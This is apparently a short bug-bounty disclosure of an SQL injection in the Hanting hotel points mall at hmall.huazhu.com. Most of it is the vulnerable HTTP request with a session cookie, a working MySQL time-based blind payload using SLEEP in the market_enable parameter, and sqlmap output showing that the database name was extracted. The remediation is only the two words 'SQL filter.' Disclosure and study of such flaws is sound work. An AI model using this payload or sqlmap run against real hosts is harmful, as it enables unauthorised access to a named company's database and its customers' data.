Hanting hotel points mall system SQL Injection Vulnerability (root permission)

Hanting hotel points mall system SQL Injection Vulnerability (root permission)

RT

GET/hmall/webapp/storeCatGoods! ListStoreGoodsJson. do? Disable = 0 & market_enable = 1 & page = 1 & rows = 10 & store_id = 16 & _ = 1449301268455 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://hmall.huazhu.com: 80/Cookie: JSESSIONID = 15DEC9589FC499A4A0014C2C69311945Host: hmall.huazhu.com injection parameter market_enable

---Parameter: #1* (URI)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: http://hmall.huazhu.com:80/hmall/webapp/storeCatGoods!listStoreGoodsJson.do?disable=0&market_enable=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OYQx)&page=1&rows=10&store_id=16&_=1449301268455---[15:58:16] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[15:58:16] [INFO] fetching current database[15:58:16] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[15:58:16] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                              do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [15:59:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [16:00:17] [INFO] adjusting time delay to 4 seconds due to good response timeshmallb2ccurrent database:    'hmallb2c'[16:04:09] [INFO] fetched data logged to text files under '/Users/farmer/.sqlmap/output/hmall.huazhu.com'[*] shutting down at 16:04:09

 

 

Solution:

SQL filter.